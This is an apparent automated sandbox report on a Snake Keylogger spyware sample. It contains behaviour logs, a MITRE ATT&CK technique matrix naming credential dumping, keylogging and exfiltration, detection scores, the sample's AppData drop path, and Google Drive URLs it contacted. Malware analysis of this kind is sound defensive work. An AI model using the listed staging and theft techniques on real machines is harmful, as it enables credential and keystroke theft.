    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeCode function: 0_2_00405D68 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405D68

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Windows Management Instrumentation    		1
    DLL Side-Loading    		311
    Process Injection    		1
    Masquerading    		OS Credential Dumping211
    Security Software Discovery    		Remote Services1
    Archive Collected Data    		11
    Encrypted Channel    		Exfiltration Over Other Network Medium1
    System Shutdown/Reboot
    CredentialsDomainsDefault Accounts1
    Native API    		Boot or Logon Initialization Scripts1
    DLL Side-Loading    		131
    Virtualization/Sandbox Evasion    		LSASS Memory1
    Process Discovery    		Remote Desktop Protocol1
    Clipboard Data    		3
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    PowerShell    		Logon Script (Windows)Logon Script (Windows)311
    Process Injection    		Security Account Manager131
    Virtualization/Sandbox Evasion    		SMB/Windows Admin SharesData from Network Shared Drive3
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Software Packing    		NTDS1
    Application Window Discovery    		Distributed Component Object ModelInput Capture14
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading    		LSA Secrets2
    File and Directory Discovery    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials14
    System Information Discovery    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    YrCSUX2O3I.exe59%VirustotalBrowse
    YrCSUX2O3I.exe58%ReversingLabsWin32.Spyware.Snakekeylogger

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Skolevsens\YrCSUX2O3I.exe58%ReversingLabsWin32.Spyware.Snakekeylogger
    C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Skolevsens\YrCSUX2O3I.exe59%VirustotalBrowse

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    No Antivirus matches

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    s-part-0017.t-0009.t-msedge.net
    		13.107.246.45
    		truefalse
      		high
      drive.google.com
      		142.250.184.206
      		truefalse
        		high
        drive.usercontent.google.com
        		142.250.181.225
        		truefalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://www.google.commsiexec.exe, 00000008.00000003.2515750713.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2135941062.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2432767321.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2185649651.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            https://drive.google.com/;msiexec.exe, 00000008.00000003.2249580479.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220377097.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2209315293.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2231876313.0000000007FF2000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              https://drive.google.com/ervices-cn.commsiexec.exe, 00000008.00000003.2185608477.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2172678889.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2161927602.0000000007FF3000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                https://drive.google.com/etmsiexec.exe, 00000008.00000003.2135873204.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2147098085.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2123562712.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2110507536.0000000007FF3000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://translate.google.com/translate_a/element.jsmsiexec.exe, 00000008.00000003.2374936208.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2479027485.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2172678889.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2307435185.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2231876313.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2363131954.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2466770656.0000000008030000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220377097.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2295597744.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2479027485.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2562006346.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2147098085.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2123562712.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2352334753.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2363131954.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2161884513.0000000008037000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2385950640.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2161988964.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2515750713.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2408835178.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2098790096.0000000008037000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://drive.google.com/Wmsiexec.exe, 00000008.00000003.2220377097.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2209315293.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2231876313.0000000007FF2000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://drive.google.com/msiexec.exe, 00000008.00000003.2515750713.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://drive.google.com/rSmsiexec.exe, 00000008.00000003.2185608477.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2284814512.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2135873204.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2249580479.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2273099966.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2172678889.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2295597744.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2147098085.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2161927602.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2262078863.0000000007FED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220377097.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2209315293.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2231876313.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2307435185.0000000007FF2000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://drive.google.com/umsiexec.exe, 00000008.00000003.2098833921.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2110507536.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2087985140.0000000007FF3000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://drive.google.com/ertificatesmsiexec.exe, 00000008.00000003.2185608477.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2135873204.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2172678889.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2147098085.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2123562712.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2161927602.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2098833921.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2110507536.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2087985140.0000000007FF3000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://drive.google.com/smsiexec.exe, 00000008.00000003.2397727614.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2408835178.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://drive.google.com/rmsiexec.exe, 00000008.00000003.2185608477.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2284814512.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2249580479.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2273099966.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2295597744.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2262078863.0000000007FED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220377097.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2209315293.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2231876313.0000000007FF2000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://drive.usercontent.google.com/&msiexec.exe, 00000008.00000003.2479027485.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2491715042.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2503831860.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2515750713.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://drive.usercontent.google.com/msiexec.exe, 00000008.00000003.2185608477.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2284814512.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2562006346.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2397727614.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2295597744.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2352334753.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2135873204.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2249580479.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2262078863.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2273099966.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2340671273.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2374936208.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2172678889.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2307435185.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2363131954.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220377097.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2295597744.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2479027485.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2147098085.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2123562712.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2161927602.0000000007FF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://drive.usercontent.google.com/:msiexec.exe, 00000008.00000002.2585091489.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2575236744.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://drive.google.com/lmsiexec.exe, 00000008.00000003.2110507536.0000000007FF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://drive.google.com/te.google.commsiexec.exe, 00000008.00000003.2185608477.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2284814512.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2397727614.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2352334753.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2135873204.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2249580479.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2273099966.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2340671273.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2374936208.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2172678889.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2363131954.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2295597744.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2147098085.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2123562712.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2161927602.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2262078863.0000000007FED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220377097.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2209315293.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2231876313.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2318203930.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2307435185.0000000007FF2000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://apis.google.commsiexec.exe, 00000008.00000003.2515750713.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2135941062.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2432767321.0000000007F99000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://nsis.sf.net/NSIS_ErrorErrorYrCSUX2O3I.exe, YrCSUX2O3I.exe.2.drfalse
                                                		high
                                                https://drive.google.com/gmsiexec.exe, 00000008.00000003.2562006346.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2479027485.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2466820778.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2444511172.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2491715042.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2585091489.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2526749849.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2575236744.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2549615290.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2538548894.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2503831860.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2455058177.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2515750713.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://drive.google.com/nalytics-cn.commsiexec.exe, 00000008.00000003.2135873204.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2172678889.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2147098085.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2123562712.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2161927602.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2098833921.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2110507536.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2087985140.0000000007FF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://drive.google.com/devine.cnmsiexec.exe, 00000008.00000003.2135873204.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2123562712.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2110507536.0000000007FF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://drive.google.com/Cmsiexec.exe, 00000008.00000003.2329580852.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2466820778.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2515750713.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2262078863.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2562006346.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2421732807.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2295597744.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2123795079.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2503831860.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2549615290.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2408835178.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220377097.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2397727614.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2135941062.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2575236744.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2209315293.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2273099966.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2284814512.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2363131954.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2374936208.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2172727495.0000000007FC5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://drive.google.com/cmsiexec.exe, 00000008.00000003.2185608477.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2284814512.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2397727614.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2352334753.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2249580479.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2273099966.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2340671273.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2374936208.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2363131954.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2295597744.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2408835178.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2262078863.0000000007FED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220377097.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2209315293.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2231876313.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2444511172.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2318203930.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2307435185.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2421732807.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2385950640.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2329580852.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          142.250.181.225
                                                          		drive.usercontent.google.comUnited States
                                                          		15169GOOGLEUSfalse
                                                          142.250.184.206
                                                          		drive.google.comUnited States
                                                          		15169GOOGLEUSfalse

                                                          General Information

                                                          Joe Sandbox version:42.0.0 Malachite
                                                          Analysis ID:1588371
